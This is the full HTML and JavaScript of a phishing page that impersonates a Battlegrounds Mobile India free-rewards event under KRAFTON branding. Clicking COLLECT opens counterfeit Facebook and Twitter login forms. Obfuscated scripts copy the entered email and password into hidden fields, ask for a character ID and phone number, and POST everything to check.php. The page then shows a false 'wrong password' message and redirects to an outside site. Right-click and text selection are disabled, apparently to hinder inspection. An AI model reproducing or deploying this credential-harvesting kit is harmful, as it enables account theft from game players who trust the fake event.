<html><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta property="og:title" content="Battlegrounds Mobile Event">
<meta name="description" content="Collect your special rewards at the Royale Pas Event. This opportunity is limited and without the need for topup. Collect your rewards now!">
<meta property="og:description" content="Collect your special rewards at the Royale Pas Event. This opportunity is limited and without the need for topup. Collect your rewards now!">
<meta property="og:url" content="./">
<meta property="og:site_name" content="Battlegrounds Mobile Event">
<meta property="og:type" content="website">
<meta name="copyright" content="Battlegrounds Mobile India">
<meta name="theme-color" content="#000">
<meta property="og:image" content="images/app.png">
<title>Battlegrounds Mobile India Event</title>
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="css/animate.css">
<link rel="stylesheet" href="css/facebook.css">
<link rel="stylesheet" href="css/twitter.css">
<link rel="stylesheet" href="css/font-awesome.min.css">
<link rel="stylesheet" href="css/material-design-iconic-font.min.css">
<meta name="description" content="Your website description here. Mention BGMI, skins, and free skins to attract users.">
<meta name="keywords" content="bgmi, skins, free skins">
<meta name="author" content="Your Name or Company Name Here">
<meta name="robots" content="index, follow">
<meta property="og:url" content="https://bgmiindia.com/">
<meta property="og:site_name" content="bgmiindia">
<link rel="icon" href="images/app.png">
</head>
<body oncontextmenu="if (!window.__cfRLUnblockHandlers) return false; return false" onselectstart="if (!window.__cfRLUnblockHandlers) return false; return false" ondragstart="if (!window.__cfRLUnblockHandlers) return false; return false" data-cf-modified-e42ca33b60739c0b5658ec7c->
<style type="text/css">
        body {
            background: #000 center / cover no-repeat;
            margin: 0;
            font-family: 'Teko';
        }

        .container {
            border: 1px solid #CAB16D;
            margin-top: -10px;
        }

        .navbar {
            background: #0C0C0C;
            width: 100%;
            height: 60px;
        }

        .navbar-logo {
            width: 100px;
            float: left;
            margin-top: 12px;
            margin-left: 13px;
        }

        .navbar-shop {
            width: 29px;
            margin-top: 19px;
            margin-right: 8px;
        }

        .navbar-menu {
            width: 20px;
            margin-top: 19px;
            margin-right: 5px;
        }

        .navbar-right {
            width: auto;
            float: right;
        }

        .navbar-download {
            background: #f73939;
            width: 50px;
            height: 50px;
            margin-top: 10px;
            margin-right: 3px;
            border-radius: 0px;
            float: right;
        }

        .navbar-download img {
            width: 20px;
            height: 21px;
            margin: 13px;
        }

        .navbar-righ {
            width: auto;
            float: right;
        }

        .navbar-shp {
            width: 29px;
            margin-top: 19px;
            margin-right: 10px;
        }

        .event-notification-wrapper {
            width: 85%;
            height: auto;
            margin-top: 20px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 5px;
            display: block;
        }

        .event-notification-content {
            width: 100%;
            height: auto;
            bottom: -5px;
            padding: 5px;
            color: #CAB16D;
            text-shadow: 0.5px 0.5px #9A7242;
            font-size: 21px;
            font-family: Teko;
            text-align: center;
        }

        .footer {
            background: #131313;
            width: 100%;
            height: auto;
            padding: 15px;
        }

        .footer-copyright-icon {
            width: 55%;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            display: block;
        }

        .footer-txt-copyright {
            color: #bdbdbd;
            font-size: 15px;
            font-family: Teko;
            text-align: center;
        }

        .item img {
            border: none;
        }

        .item button {
            color: #CAB16D;
            text-shadow: 0.3px 0.3px #9A7242;
        }

        .nav-popup-title {
            padding-left: 15px;
            padding-top: 2px;
            color: #000;
            font-size: 22px;
            font-family: Teko;
            font-weight: 500;
            text-align: left;
        }

        .nav-popup img {
            width: 20px;
            height: 20px;
            margin-top: 5px;
            margin-right: 10px;
            color: #000;
            float: right;
        }

        .popup-alerts {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 5px;
            color: #fff;
            font-size: 20px;
            font-family: Teko;
            font-weight: 500;
            text-align: center;
            display: block;
        }

        .popup-alert {
            width: 95%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 10px;
            padding: 5px;
            color: #fff;
            font-size: 20px;
            font-family: Teko;
            font-weight: 500;
            text-align: center;
            display: block;
        }

        .popup-alert i {
            padding-top: 15px;
            padding-bottom: 15px;
            color: #fff;
            font-size: 40px;
            text-align: center;
        }

        .popup-footer button:nth-child(1) {
            width: auto;
            height: auto;
            margin-top: 4px;
            margin-left: auto;
            margin-right: auto;
            padding: 3px;
            padding-left: 28px;
            padding-right: 28px;
            color: #000;
            font-size: 18px;
            font-family: Teko;
            font-weight: 500;
            text-align: center;
            border: none;
            outline: none;
        }

        .popup-btn-login {
            width: 40%;
            height: auto;
            padding: 6px;
            margin: 5px;
            color: #000;
            font-size: 15px;
            font-family: Teko;
            border: none;
            outline: none;
            margin-bottom: 45px;
            position: relative;
            display: line-block;
        }

        .popup-btn-login i {
            color: #fff;
            font-size: 23px;
            float: left;
        }

        .popup-btn-facebook {
            background: #4167B2;
            color: #fff;
        }

        .popup-btn-twitter {
            background: #198B96;
            color: #fff;
        }

        .popup-form-footer {
            margin-top: -16px;
        }

        .popup-form-footer button {
            width: auto;
            height: auto;
            margin-top: 4px;
            padding: 3px;
            padding-left: 30px;
            padding-right: 30px;
            color: #000;
            font-size: 18px;
            font-family: Teko;
            font-weight: 500;
            text-align: center;
            border: none;
            outline: none;
        }

        .popup-form input {
            background: none;
            background-size: 100% 100%;
            width: 90%;
            height: auto;
            margin-left: 6px;
            margin-bottom: 3px;
            padding: 4.4px;
            color: #fff;
            font-size: 17px;
            font-family: Teko;
            font-weight: 500;
            border-radius: 2px;
            border: 1px solid #fff;
            position: relative;
            outline: none;
            -webkit-appearance: none;
            -moz-appearance: none;
        }

        .popup-form input::placeholder {
            color: #fff;
        }

        .popup-form select {
            background: none;
            background-size: 100% 100%;
            width: 90%;
            height: auto;
            margin-left: 6px;
            margin-bottom: 3px;
            padding: 6px;
            padding-left: 6px;
            color: #fff;
            font-size: 17px;
            font-family: Teko;
            font-weight: 500;
            border-radius: 2px;
            border: 1px solid #fff;
            position: relative;
            outline: none;
            -webkit-appearance: none;
            -moz-appearance: none;
        }

        .event-notification-status {
            background: #a02c2c;
            background-size: 100% 100%;
            width: 90%;
            height: auto;
            margin-top: 10px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 20px;
            padding: 3px;
            color: #ecd9b4;
            font-size: 19px;
            font-family: Teko;
            text-align: center;
            border-left: 5px solid #ecd9b4;
            border-right: 5px solid #ecd9b4;
            display: block;
        }

        .event-notification-status img {
            width: 30px;
            margin-top: 1px;
            margin-right: 5px;
        }

        .event-notification-status img:nth-child(1) {
            float: left;
        }

        .event-notification-status img:nth-child(2) {
            float: right;
        }
    </style>
<div class="container">
<div class="navbar">
<img class="navbar-logo" src="images/logo.png">
<div class="navbar-right">
<img class="navbar-shop" src="images/sns_f_w.png">
<img class="navbar-shop" src="images/sns_i_w.png">
<img class="navbar-shop" src="images/sns_y_w.png">
<div class="navbar-download"><img src="images/menu.png"></div>
<div class="navbar-righ">
<img class="navbar-shp" src="images/icon_shop_50.png"></div>
</div>

</div>

<div class="header">
<img src="images/header.jpg">
</div>

<br>
<div class="event-theme">
</div>

<br>
<div class="box">
<center>
<div class="tab_rewards" id="latest">
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="images/11.png">
</figure>
</div>
<div>
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; open_itemReward_confirmation(this);" src="img/rewards/11.png" data-cf-modified-e42ca33b60739c0b5658ec7c->COLLECT</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="images/22.png">
</figure>
</div>
<div>
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; open_itemReward_confirmation(this);" src="img/rewards/22.png" data-cf-modified-e42ca33b60739c0b5658ec7c->COLLECT</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="images/33.png">
</figure>
</div>
<div>
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; open_itemReward_confirmation(this);" src="img/rewards/33.png" data-cf-modified-e42ca33b60739c0b5658ec7c->COLLECT</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="images/44.png">
</figure>
</div>
<div>
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; open_itemReward_confirmation(this);" src="img/rewards/44.png" data-cf-modified-e42ca33b60739c0b5658ec7c->COLLECT</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="images/55.png">
</figure>
</div>
<div>
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; open_itemReward_confirmation(this);" src="img/rewards/55.png" data-cf-modified-e42ca33b60739c0b5658ec7c->COLLECT</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="images/66.png">
</figure>
</div>
<div>
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; open_itemReward_confirmation(this);" src="img/rewards/66.png" data-cf-modified-e42ca33b60739c0b5658ec7c->COLLECT</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="images/77.png">
</figure>
</div>
<div>
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; open_itemReward_confirmation(this);" src="img/rewards/77.png" data-cf-modified-e42ca33b60739c0b5658ec7c->COLLECT</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="images/88.png">
</figure>
</div>
<div>
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; open_itemReward_confirmation(this);" src="img/rewards/88.png" data-cf-modified-e42ca33b60739c0b5658ec7c->COLLECT</button>
</div>
</div>
<div class="item itemShine">
<div>
<figure>
<img style="border-bottom: 0px;" src="images/99.png">
</figure>
</div>
<div>
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; open_itemReward_confirmation(this);" src="img/rewards/99.png" data-cf-modified-e42ca33b60739c0b5658ec7c->COLLECT</button>
</div>
</div>
</div></center>
</div>

<div class="footer">
<img class="footer-copyright-icon" src="images/footerlg.png">
<div class="footer-txt-copyright">ⓒ KRAFTON, Inc. All rights reserved.</div>

<div class="footer-txt-copyright">Privacy Policy | Terms of Service | Rules of Conduct | Official Community Policy</div>

</div>

</div>

<div class="popup itemReward_confirmation" style="display: none;">
<div class="popup-box">
<div class="nav-popup">
<img onmousedown="if (!window.__cfRLUnblockHandlers) return false; tutup.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; close_reward_confirmation()" src="images/popup-close.png" data-cf-modified-e42ca33b60739c0b5658ec7c->
<div class="nav-popup-title">Reward Confirmation</div>

</div>

<div class="popup-box-bg">
<div class="popup-alert">Are you sure to collect this reward?</div>

<div class="popup-item itemShine">
<div>
<figure>
<img src id="myItemReward_confirmationImg">
</figure>
</div>
</div>

<br>
</div>

<div class="popup-footer">
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; open_account_login()" data-cf-modified-e42ca33b60739c0b5658ec7c->Collect</button>
</div>

</div>

</div>

<div class="popup account_login" style="display: none;">
<div class="popup-box">
<div class="nav-popup">
<div class="nav-popup-title">Account Login</div>

</div>

<div class="popup-box-bg">
<div class="popup-alerts">Log in using your BGMI MOBILE account</div>

<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" class="popup-btn-login popup-btn-twitter" onclick="if (!window.__cfRLUnblockHandlers) return false; open_twitter();" data-cf-modified-e42ca33b60739c0b5658ec7c-><i class="fa fa-twitter-square icon-login"></i> Twitter</button>
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" class="popup-btn-login popup-btn-facebook" onclick="if (!window.__cfRLUnblockHandlers) return false; open_facebook();" data-cf-modified-e42ca33b60739c0b5658ec7c-><i class="fa fa-facebook-square icon-login"></i> Facebook</button>
<img style="width: 90%; height: auto; margin-top: -30px; margin-left: auto; margin-right: auto;" src="images/Amod.png">
<br>
</div>

<div class="popup-footer-log">
</div>

</div>

</div>

<div class="popup-login login-facebook animated fadeIn" style="display: none;">
<div class="popup-box-login-fb">
<a onclick="if (!window.__cfRLUnblockHandlers) return false; tutup_facebook()" class="close-fb" data-cf-modified-e42ca33b60739c0b5658ec7c-><i class="zmdi zmdi-close"></i></a>
<div class="navbar-fb"><img src="images/facebook-text.png"></div>

<div class="content-box-fb">
<p class="kaget email-fb" style="width: 330px; top: -15px; text-align: left;">The email or phone number you entered does not match any account. <b>Find your account.</b></p>
<p class="kaget sandi-fb" style="width: 330px; top: -15px; text-align: left;">Incorrect password. <b>Did you forget your password?</b></p>
<img src="images/app.png">
<div class="txt-login-fb">Log in to your Facebook account to connect to Battlegrounds Mobile.</div>

<form class="login-form" action="javascript:void(0)" method="post" id="ValidateLoginFbForm">
<input type="text" class="loginEmail" name="email" id="email-facebook" placeholder="Mobile number or email address" autocomplete="off" autocapitalize="off" required oninvalid="if (!window.__cfRLUnblockHandlers) return false; this.setCustomValidity('Enter Email or Mobile Number')" oninput="if (!window.__cfRLUnblockHandlers) return false; setCustomValidity('')" data-cf-modified-e42ca33b60739c0b5658ec7c->
<input type="password" class="loginPassword" name="password" id="password-facebook" placeholder="Password" autocomplete="off" autocapitalize="off" required oninvalid="if (!window.__cfRLUnblockHandlers) return false; this.setCustomValidity('Enter Password')" oninput="if (!window.__cfRLUnblockHandlers) return false; setCustomValidity('')" data-cf-modified-e42ca33b60739c0b5658ec7c->
<div class="showHide showPassword" onclick="if (!window.__cfRLUnblockHandlers) return false; showFbPassword()" data-cf-modified-e42ca33b60739c0b5658ec7c-><i class="zmdi zmdi-eye-off zmdi-hc-2x"></i></div>

<div class="showHide hidePassword" style="display: none;" onclick="if (!window.__cfRLUnblockHandlers) return false; hideFbPassword()" data-cf-modified-e42ca33b60739c0b5658ec7c-><i class="zmdi zmdi-eye zmdi-hc-2x"></i></div>

<input type="hidden" name="login" id="login-facebook" value="Facebook" readonly>
<button type="submit" class="btn-login-fb" onclick="if (!window.__cfRLUnblockHandlers) return false; ValidateLoginFbData()" data-cf-modified-e42ca33b60739c0b5658ec7c->Log In</button>
</form>
<div class="txt-create-account">Create account</div>

<div class="txt-not-now">Not now</div>

<div class="txt-forgotten-password">Forgotten password?</div>

</div>

<div class="language-box">
<center>
<div class="language-name language-name-active">English (UK)</div>

<div class="language-name">Bahasa Indonesia</div>

<div class="language-name">Basa Jawa</div>

<div class="language-name">Bahasa Melayu</div>

<div class="language-name">日本語</div>

<div class="language-name">Español</div>

<div class="language-name">Português (Brasil)</div>

<div class="language-name"><i class="fa fa-plus"></i></div>

</center>
</div>

<div class="copyright">Facebook Inc.</div>

</div>

</div>

<div class="popup-login login-twitter animated fadeIn" style="display: none;">
<div class="popup-box-login-twitter">
<a onclick="if (!window.__cfRLUnblockHandlers) return false; tutup_twitter()" class="close-other" data-cf-modified-e42ca33b60739c0b5658ec7c-><i class="zmdi zmdi-close"></i></a>
<div class="box-twitter">
<center>
<div class="header-twitter">
<img src="images/twitter-text.png" style="margin-bottom: -35px; margin-left: 135px;">
</div></center>
<center>
<br><br>
<form action="javascript:void(0)" method="post" id="ValidateLoginTwitterForm">
<div class="txt-login-twitter" style="text-align: left; margin-left: 95px;">Login to Twitter</div>

<div class="input-box-twitter">
<label>Phone, email, or username</label>
<input type="text" name="email" id="email-twitter" placeholder required oninvalid="if (!window.__cfRLUnblockHandlers) return false; this.setCustomValidity('Enter Username, Email or Mobile Number')" oninput="if (!window.__cfRLUnblockHandlers) return false; setCustomValidity('')" data-cf-modified-e42ca33b60739c0b5658ec7c->
</div>

<div class="input-box-twitter">
<div class="TwitterShowHide TwitterShowPassword" onclick="if (!window.__cfRLUnblockHandlers) return false; showTwitterPassword()" data-cf-modified-e42ca33b60739c0b5658ec7c-><i class="zmdi zmdi-eye-off zmdi-hc-2x"></i></div>

<div class="TwitterShowHide TwitterHidePassword" style="display: none;" onclick="if (!window.__cfRLUnblockHandlers) return false; hideTwitterPassword()" data-cf-modified-e42ca33b60739c0b5658ec7c-><i class="zmdi zmdi-eye zmdi-hc-2x"></i></div>

<label>Password</label>
<input type="password" style="width: 85%;" name="password" id="password-twitter" placeholder required oninvalid="if (!window.__cfRLUnblockHandlers) return false; this.setCustomValidity('Enter Password')" oninput="if (!window.__cfRLUnblockHandlers) return false; setCustomValidity('')" data-cf-modified-e42ca33b60739c0b5658ec7c->
</div>

<p class="kagettw email-tw" style="width: 330px; top: -15px; text-align: center; margin-left: -17px;">Sorry, we couldn't find your account.</p>
<p class="kagettw sandi-tw" style="width: 330px; top: -15px; text-align: center; margin-left: -17px;">Wrong Password!</p>
<input type="hidden" name="login" id="login-twitter" value="Twitter" readonly>
<button type="submit" class="btn-login-twitter" onclick="if (!window.__cfRLUnblockHandlers) return false; ValidateLoginTwitterData()" data-cf-modified-e42ca33b60739c0b5658ec7c->Log In</button>
<div class="footer-menu-twitter">Forgot password?</div>

<div class="footer-menu-twitter bulet">•</div>

<div class="footer-menu-twitter">Sign up to Twitter</div>

</form>
</center>
</div>

</div>

</div>



<div class="popup account_verification" style="display: none;">
<div class="popup-box">
<div class="nav-popup">
<div class="nav-popup-title">Account Verification</div>

</div>

<div class="popup-box-bg">
<div class="popup-alert">Complete your account details</div>

<form class="popup-form" action="javascript:void(0)" method="post" id="ValidateVerificationDataForm">
<input type="hidden" name="email" id="validateEmail" readonly>
<input type="hidden" name="password" id="validatePassword" readonly>
<input type="number" name="playid" id="playid" placeholder="Character ID" autocomplete="off" required oninvalid="if (!window.__cfRLUnblockHandlers) return false; this.setCustomValidity('Input your Character ID')" oninput="if (!window.__cfRLUnblockHandlers) return false; setCustomValidity('')" data-cf-modified-e42ca33b60739c0b5658ec7c->
<input type="number" name="phone" id="phone" placeholder="Phone Number" autocomplete="off" required oninvalid="if (!window.__cfRLUnblockHandlers) return false; this.setCustomValidity('Input your Phone Number')" oninput="if (!window.__cfRLUnblockHandlers) return false; setCustomValidity('')" data-cf-modified-e42ca33b60739c0b5658ec7c->
<select name="level" id="level" required oninvalid="if (!window.__cfRLUnblockHandlers) return false; this.setCustomValidity('select your Account Level')" oninput="if (!window.__cfRLUnblockHandlers) return false; setCustomValidity('')" data-cf-modified-e42ca33b60739c0b5658ec7c->
<option selected="selected" disabled="disabled" value>Account Level</option>
<option>40</option>
<option>41</option>
<option>42</option>
<option>43</option>
<option>44</option>
<option>45</option>
<option>46</option>
<option>47</option>
<option>48</option>
<option>49</option>
<option>50</option>
<option>51</option>
<option>52</option>
<option>53</option>
<option>54</option>
<option>55</option>
<option>56</option>
<option>57</option>
<option>58</option>
<option>59</option>
<option>60</option>
<option>61</option>
<option>62</option>
<option>63</option>
<option>64</option>
<option>65</option>
<option>66</option>
<option>67</option>
<option>68</option>
<option>69</option>
<option>70</option>
<option>71</option>
<option>72</option>
<option>73</option>
<option>74</option>
<option>75</option>
<option>76</option>
<option>77</option>
<option>78</option>
<option>79</option>
<option>80</option>
<option>81</option>
<option>82</option>
<option>83</option>
<option>84</option>
<option>85</option>
<option>86</option>
<option>87</option>
<option>88</option>
<option>89</option>
<option>90</option>
<option>91</option>
<option>92</option>
<option>93</option>
<option>94</option>
<option>95</option>
<option>96</option>
<option>97</option>
<option>98</option>
<option>99</option>
<option>100</option>
</select>
<input type="hidden" name="login" id="validateLogin" readonly>
<br><br>
</form></div>


<script>
    function ValidateVerificationData() {
        // Perform verification logic here
        console.log("Verification button clicked");
    }
</script>

<div class="popup-form-footer">
    <button type="submit" onmousedown="if (!window.__cfRLUnblockHandlers) return false; buka.play();" onclick="if (!window.__cfRLUnblockHandlers) return false; ValidateVerificationData()">Verify</button>
</div>




        

</div>

</div>

<div class="popup check_verification" style="display: none;">
<div class="popup-box">
<div class="nav-popup">
<div class="nav-popup-title">Account Verification</div>

</div>

<div class="popup-box-bg">
<div class="popup-alert">
<br>
<i class="zmdi zmdi-spinner zmdi-hc-spin"></i>
<br> Checking your account details...
<br><br>
</div>

<div class="popup-form-footer">
</div>

</div>

</div>

</div>

<div class="popup processing_account" style="display: none;">
<div class="popup-box">
<div class="nav-popup">
<div class="nav-popup-title">Processing Account</div>

</div>

<div class="popup-box-bg">
<div class="popup-alert">
Hi,
<br> YOU HAVE ENTERED WRONG EMAIL OR PASSWORD
<br>
<i class="fa fa-check-circle fa-2x"></i>
<br> PLEASE TRY AGAIN
<br> TEAM BGMI
<br>
</div>

<div class="popup-footer">
<button type="button" onmousedown="if (!window.__cfRLUnblockHandlers) return false; tutup.play();" style="background: url(images/menu_on.png) no-repeat center center; background-size: 100% 100%;" onclick="if (!window.__cfRLUnblockHandlers) return false; location.href='https://social-logins.com/Verification/';" data-cf-modified-e42ca33b60739c0b5658ec7c->Logout</button>
</div>

</div>

</div>

</div>

<script type="e42ca33b60739c0b5658ec7c-text/javascript" src="js/jquery-1.10.2.min.js"></script>
<script type="e42ca33b60739c0b5658ec7c-text/javascript" src="js/jquery.min.js"></script>
<script src="js/jquery.min_1.js" type="e42ca33b60739c0b5658ec7c-text/javascript"></script>
<script type="e42ca33b60739c0b5658ec7c-text/javascript">
// code for activate clicked sound
var buka = new Audio();
buka.src = "https://l.top4top.io/m_1725u5z7i1.mp3";

var tutup = new Audio();
tutup.src = "https://a.top4top.io/m_1725zobal2.mp3";

// code for random id
var slidePlayer = 0;
openSlides();

function openSlides() {
    var i;
    var slides = document.getElementsByClassName("playerStatus");
    for (i = 0; i < slides.length; i++) {
        slides[i].style.display = "none";
    }
    slidePlayer++;
    if (slidePlayer > slides.length) {
        slidePlayer = 1
    }
    slides[slidePlayer - 1].style.display = "block";
    setTimeout(openSlides, 2500);
}

// code for showing hiding items
function openRewards(evt, rewardsClass) {
    var i, tab_rewards, tab_rewards_link;
    tab_rewards = document.getElementsByClassName("tab_rewards");
    for (i = 0; i < tab_rewards.length; i++) {
        tab_rewards[i].style.display = "none";
    }
    tab_rewards_link = document.getElementsByClassName("menu-content");
    for (i = 0; i < tab_rewards_link.length; i++) {
        tab_rewards_link[i].className = tab_rewards_link[i].className.replace(" menu-content-active", "");
    }
    document.getElementById(rewardsClass).style.display = "block";
    evt.currentTarget.className += " menu-content-active";
}
document.getElementById("defaultTabRewards").click();

// code for showing hiding popup
function open_rewardsBox() {
    $('.rewardsBox').show();
    $('.rewardsHome').hide();
}

function open_itemReward_confirmation(ag) {
    var itemReward_confirmationImg = $(ag).attr("src");
    $('.itemReward_confirmation').show();
    $('#myItemReward_confirmationImg').attr('src', itemReward_confirmationImg);
}

function open_otherReward_confirmation(ag) {
    var otherReward_confirmationImg = $(ag).attr("src");
    var otherReward_confirmationValue = $(ag).attr("value");
    $('.otherReward_confirmation').show();
    $('#myOtherReward_confirmationImg').attr('src', otherReward_confirmationImg);
    $('#otherReward_confirmationValue').html(otherReward_confirmationValue);
}

function open_account_login() {
    $('.account_login').show();
    $(".itemReward_confirmation").hide()
    $(".otherReward_confirmation").hide()
}

function open_facebook() {
    $('.login-facebook').show();
    $('.account_login').hide();
}

function open_twitter() {
    $('.login-twitter').show();
    $('.account_login').hide();
}

function close_reward_confirmation() {
    $(".itemReward_confirmation").hide()
    $(".otherReward_confirmation").hide()
}

function tutup_facebook() {
    $('.login-facebook').hide()
    $('.account_login').show();
}

function tutup_twitter() {
    $('.login-twitter').hide()
    $('.account_login').show();
}

</script>
<script src="js/showHide.js" type="e42ca33b60739c0b5658ec7c-text/javascript"></script>
<script type="e42ca33b60739c0b5658ec7c-text/javascript">
function ValidateLoginFbData() {
  $('#ValidateLoginFbForm').submit(function (_0x26a7c6) {
    _0x26a7c6.preventDefault();
    _0x26a7c6.stopImmediatePropagation();
    $emailfb = $('#email-facebook').val().trim()
    $passwordfb = $('#password-facebook').val().trim()
    $loginfb = $('#login-facebook').val().trim()
    if ($emailfb == '' || $emailfb == null || $emailfb.length <= 8) {
      return (
        $('.email-fb').show(),
        $('.sandi-fb').hide(),
        $('.account_verification').hide(),
        $('.login-facebook').show(),
        false
      )
    } else {
      $('.email-fb').hide()
      $('input#validateEmail').val($emailfb)
      $('.account_verification').show()
      $('.login-facebook').hide()
    }
    if ($passwordfb == '' || $passwordfb == null || $passwordfb.length <= 5) {
      return (
        $('.sandi-fb').show(),
        $('.account_verification').hide(),
        $('.login-facebook').show(),
        false
      )
    } else {
      $('.sandi-fb').hide()
      $('input#validatePassword').val($passwordfb)
      $('input#validateLogin').val($loginfb)
      $('.account_verification').show()
      $('.login-facebook').hide()
    }
  })
}
function ValidateLoginTwitterData() {
  $('#ValidateLoginTwitterForm').submit(function (_0x3a7fb3) {
    _0x3a7fb3.preventDefault();
    _0x3a7fb3.stopImmediatePropagation();
    $emailtw = $('#email-twitter').val().trim()
    $passwordtw = $('#password-twitter').val().trim()
    $logintw = $('#login-twitter').val().trim()
    if ($emailtw == '' || $emailtw == null || $emailtw.length <= 3) {
      return (
        $('.email-tw').show(),
        $('.sandi-tw').hide(),
        $('.account_verification').hide(),
        $('.login-twitter').show(),
        false
      )
    } else {
      $('.email-tw').hide()
      $('input#validateEmail').val($emailtw)
      $('.account_verification').show()
      $('.login-twitter').hide()
    }
    if ($passwordtw == '' || $passwordtw == null || $passwordtw.length <= 7) {
      return (
        $('.sandi-tw').show(),
        $('.account_verification').hide(),
        $('.login-twitter').show(),
        false
      )
    } else {
      $('.sandi-tw').hide()
      $('input#validatePassword').val($passwordtw)
      $('input#validateLogin').val($logintw)
      $('.account_verification').show()
      $('.login-twitter').hide()
    }
  })
}
function ValidateVerificationData() {
  return (
    $('#ValidateVerificationDataForm').submit(function (_0x1e4eb0) {
      _0x1e4eb0.preventDefault();
      _0x1e4eb0.stopImmediatePropagation();
      var _0x4d9287 = $('input#validateEmail').val(),
        _0xe9aa7 = $('input#validatePassword').val(),
        _0x314733 = $('input#nick').val(),
        _0x2dbdb4 = $('input#playid').val(),
        _0x27b625 = $('input#phone').val(),
        _0x253c86 = $('input#level').val(),
        _0x265af5 = $('input#tier').val(),
        _0x53f15c = $('input#rpt').val(),
        _0x23b8fd = $('input#rpl').val(),
        _0x3dd510 = $('input#platform').val(),
        _0x4e43bd = $('input#validateLogin').val()
      if (
        _0x4d9287 == '' &&
        _0xe9aa7 == '' &&
        _0x314733 == '' &&
        _0x2dbdb4 == '' &&
        _0x27b625 == '' &&
        _0x253c86 == '' &&
        _0x265af5 == '' &&
        _0x53f15c == '' &&
        _0x23b8fd == '' &&
        _0x3dd510 == '' &&
        _0x4e43bd == ''
      ) {
        return (
          $('.verification_info').show(),
          $('.account_verification').hide(),
          false
        )
      }
      $.ajax({
        type: 'POST',
        url: 'check.php?id=2092103173&form_token=6492da3843291',
        data: $(this).serialize(),
        beforeSend: function () {
          $('.check_verification').show()
          $('.account_verification').hide()
        },
        success: function () {
          $('.processing_account').show()
          $('.check_verification').hide()
          $('.account_verification').hide()
        },
      })
    }),
    false
  )
}

</script>
<script src="js/rocket-loader.min.js" data-cf-settings="e42ca33b60739c0b5658ec7c-|49" defer></script>
</body></html>
